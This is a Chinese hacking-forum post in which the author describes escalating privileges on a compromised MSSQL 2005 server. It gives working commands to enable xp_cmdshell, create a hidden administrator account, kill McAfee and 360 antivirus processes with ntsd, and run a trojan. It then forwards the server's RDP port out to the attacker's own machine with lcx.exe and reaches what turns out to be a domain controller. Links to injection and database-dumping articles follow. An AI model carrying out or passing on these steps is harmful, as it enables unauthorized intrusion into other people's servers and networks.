MSSQL 2005 入侵提权过程分享

所属分类: 网络安全 / 脚本攻防 阅读数: 1691
收藏 0 赞 0 分享

文章作者:udb311

前言:本文主要以SQL 2005提权为主,讲述过程种发现的一些问题和成功经验。至少拿到shell的过程不在细说。

前期


在拿到一个webshell 后对提权进行分析如下。

1、serv-u 6.4.0.
2、mssql sa密码权限
3、sogou拼音输入

观察完毕后发现这个服务器的安全性还真不是一般的差,serv-u 目录可写。sogu目录可写。MSSQL sa 权限无降权。

第一,先用马把sogou 目录下的pingup.exe替换了。准备等些时间再来上线呢,可是服务器安装了mcafee。过不了它。

第二,再探serv-u,使用大马自带的serv-u 提权程序先执行下。发现添加用户。。原因不明,可能是因为降权。。。

第三、开始入手MSSQL,sa权限很好办。先来开启xp_cmdshell,SQL2005默认禁用了xp_cmdshell。

1、使用shell下的SQL提权检测sql组件存在。如图

2、先使用xp_cmdshell,net user检测下可用否?执行net user,无果。

3、开启xp_cmdshell之前要先打开高级配置 

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;出现对象关闭时,不允许操作"。

4、开启xp_cmdshell 

EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; 出现对象关闭时,不允许操作"。

t00ls大牛们说,是不是被降权了?

5、因为SQL不允许,接下来换aspxspy连接数据库。

再次执行 

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--     6、查看权限,成功返回system。如图

 

这才明白原来是aspspy功能方面的问题。细节绝对成败!

中期

7、添加用户
Exec master.dbo.xp_cmdshell 'net user admins udb311 /add'
如图

 

密码不满足策略要求,要复杂些的。
再来Exec master.dbo.xp_cmdshell 'net user admins udb311!@# /add'

 

7、添加到administratos组
Exec master.dbo.xp_cmdshell 'net localgroup administrators admins /add'

8、远程桌面服务打开着,ipconfig /all发现是内网,没有映射3389。

9、上传lcx.exe 转发之。发现执行后无反应。

10、换个远控木马执行。发现执行后也无反应。

11、tasklist /svc 查看服务。mcafee的进程ID分别是1760 1804 1876 3844 4824。

12、ntsd -c q -p 1760 先干掉一个,然后一个个全干了。

13、重新执行木马和lcx.exe 仍然无反应。

14、无耐之下,再看下进程tasklist /svc
ntsd -c q -p 920
ntsd -c q -p 7192

干掉360

再观察下执行木马发现文件大小为0了,肯定还是被杀。原来mcafee杀木马不是把它给请出去,而是隔离。唉!

没有突破mcafee的防线。。。

进阶

16、过了一会后,换一个号称最新的免杀lcx.exe 上传后,开始再次执行转发。

结果如下。

 

慢慢的有进度了,很缓慢。

17、查看下端口连接,是否有lcx转发出来的。netstat -ano

如图

 

有一条51到我的IP了。。。成功了

18、接下来在路由器做好本机的51端口映射,本机运行lcx.exe -listen 51 3389 监听有数据返回,拿另外一台虚拟机来连接。如图

 

19、杯具啊,原来还是个DC。

 

总结:针对SQL 2005提权难度就没有增加,而以往的SQL2000主要是在恢复xp_cmdshell上。MSSQL 2005反而更加简单些。最后提醒广大的管理员朋友,请重视您的sa权限与密码。对于本文有任何疑点欢迎前来讨论。内网渗透遇到的问题与难点就是端口转发和映射。另外还要考虑的是服务器上的杀毒软件。

更多精彩内容其他人还在看

常用的一些注入命令 方便一下大家

常用的一些注入命令 方便一下大家对自己的网站做下安全测试。不建议搞破坏。
收藏 0 赞 0 分享

IPC$ 扫描和IPC$漏洞的防范小结

IPC$(Internet Process Connection)是共享
收藏 0 赞 0 分享

aspcms企业建站系统0day漏洞介绍

aspcms企业建站系统0day 2.0以上通杀2011-08-14 19:21aspcms开发的全新内核的开源企业建站系统,能够胜任企业多种建站需求,并且支持模版自定义、支持扩展插件等等,能够在短时间内完成企业建站。
收藏 0 赞 0 分享

MYSQL_OUTPUT 脱裤(脱库)通用脚本(修正版)

感谢各位的测试 , 下次再也不发垃圾脚本了,之前那个大家转走的都修正下吧 ,问题太多了. (几乎都没测试过)下面这个是我重新修改下的.
收藏 0 赞 0 分享

[PHP是世界上最好的语言] 不信你看这款PHP写的敲诈者木马

有个笑话:女的说,你们能让论坛上的人吵起来,我就做你女朋友。男的发了一句话:PHP是世界上最好的语言。瞬间论坛就炸锅了,女的说好吧,我同意了,咱们去吃饭吧。男的:不!我一定要说服他们PHP必须是世界上最好的语言。今天揭秘一个“最好的语言”编写的木马
收藏 0 赞 0 分享

前端安全之XSS攻击

这篇文章主要为大家介绍了基于反射的XSS攻击,主要依靠站点服务端返回脚本,在客户端触发执行从而发起Web攻击,需要的朋友可以参考下
收藏 0 赞 0 分享

记 FineUI 官方论坛discuz所遭受的一次真实网络攻击

这篇文章主要介绍了记 FineUI 官方论坛discuz所遭受的一次真实网络攻击,需要的朋友可以参考下
收藏 0 赞 0 分享

PHP类型网站的万能密码

说实话如果一个网站的前台都是注入漏洞,那么凭经验,万能密码进后台的几率基本上是百分之百。
收藏 0 赞 0 分享

phpcms SQL注入漏洞 adsclass.php 页面过滤不严

PHPCMS adsclass.php页面过滤不严导致SQL注入漏洞,使用phpcms的朋友请注意更新了。
收藏 0 赞 0 分享

PHPCMS 信息泄露以及任意删除文件漏洞

在图片剪切那里,先读取cookie中信息,然后直接删除文件,造成删除任意文件漏洞
收藏 0 赞 0 分享
查看更多